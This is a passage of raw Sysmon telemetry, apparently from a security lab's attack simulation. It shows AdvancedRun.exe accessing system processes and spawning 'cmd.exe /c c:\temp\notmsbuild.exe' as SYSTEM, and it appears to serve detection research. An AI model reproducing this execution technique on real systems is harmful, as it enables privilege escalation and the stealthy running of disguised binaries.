20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
istratorATTACKRANGE\Administrator 154100x80000000000000004063553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.839{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004057141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.257{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004057134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.248{834264DD-0FD9-61EB-D607-000000002702}5868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\notmsbuild.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg 
/runATTACKRANGE\Administrator 10341000x80000000000000004057133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.246{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004057132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.244{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004057131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.242{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.242{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
